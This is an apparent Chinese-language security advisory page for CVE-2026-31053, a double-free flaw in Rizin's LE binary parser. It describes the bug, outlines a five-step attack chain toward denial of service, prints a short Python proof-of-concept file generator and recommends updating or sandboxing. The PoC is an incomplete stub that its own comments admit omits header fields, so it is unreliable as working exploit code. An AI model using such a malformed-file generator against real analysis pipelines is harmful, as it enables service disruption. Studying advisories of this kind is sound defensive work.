CVE-2026-31053 CVSS 6.2 中危

CVE-2026-31053 Rizin双重释放漏洞

披露日期: 2026-04-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-31053

漏洞类型

双重释放

CVSS评分

6.2 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Rizin

漏洞概述

Rizin中的librz/bin/format/le/le.c文件存在双重释放漏洞。当处理格式错误的LE修复链时，重定位条目可能在错误处理期间被多次释放。攻击者通过构造特殊的LE二进制文件，可触发堆损坏导致应用崩溃，造成拒绝服务。

技术细节

该漏洞位于Rizin的LE（Linear Executable）格式解析模块中，具体函数为le_load_fixup_record()。漏洞根源在于对环形或格式错误的修复链处理不当。在解析过程中，当遇到错误条件进行清理时，代码未能正确检查内存指针是否已被释放，导致同一个堆内存块被释放两次。这种双重释放操作会破坏堆管理器的元数据，导致堆损坏。攻击者无需用户交互或特殊权限，只需诱导目标系统解析特制的LE二进制文件，即可触发该漏洞。由于Rizin常被集成到自动化分析流水线中，此漏洞可导致服务中断或分析工具崩溃。

攻击链分析

STEP 1

侦察

攻击者确认目标系统使用了Rizin工具，且该工具可能用于处理用户提供的二进制文件。

STEP 2

武器化

攻击者构造一个特制的LE（Linear Executable）二进制文件，其中包含格式错误或环形的修复链，旨在触发le_load_fixup_record函数中的双重释放逻辑。

STEP 3

交付

攻击者将恶意二进制文件上传至目标系统，例如通过代码仓库、文件上传接口或提交给自动化分析流水线。

STEP 4

利用

当Rizin尝试解析该恶意文件时，处理逻辑进入错误处理流程，对同一内存块执行了两次释放操作，导致堆破坏。

STEP 5

影响

应用程序因堆损坏而崩溃，导致拒绝服务，可能中断相关的安全分析或CI/CD流程。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import struct

# PoC Concept: Create a malformed LE binary with circular fixup records
# This script generates a dummy file intended to trigger the double free in le_load_fixup_record.

def generate_malformed_le(filename):
    with open(filename, 'wb') as f:
        # LE Header (Simplified)
        # Signature 'LE' (0x4C45) and some minimal fields
        f.write(b'LE')
        # ... (Other header fields would go here)
        
        # Construct a circular fixup chain entry
        # This structure is designed to confuse the parser's free logic
        fixup_data = struct.pack('<I', 0xDEADBEEF) # Invalid offset pointing back or causing loop
        f.write(fixup_data)
        
        # Fill with padding to reach the vulnerable parsing logic
        f.write(b'A' * 100)

if __name__ == "__main__":
    print("Generating PoC LE file...")
    generate_malformed_le('crash.le')
    print("File 'crash.le' generated. Run Rizin against this file to test.")

影响范围

Rizin < 0.7.0 (估算)

包含漏洞librz组件的版本

防御指南

临时缓解措施

建议立即更新Rizin至修复了该漏洞的最新版本。如果无法立即更新，应在处理不可信二进制文件时采取严格的输入验证，或者在隔离的虚拟环境中运行Rizin，以防止因应用崩溃导致的拒绝服务攻击影响生产环境。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-31053
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-31053
3 Details https://www.cvedetails.com/cve/CVE-2026-31053/
4 VulDB https://vuldb.com/cve/CVE-2026-31053
5 Link https://github.com/rizinorg/rizin/issues/5753
6 Link https://github.com/rizinorg/rizin/pull/5795

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表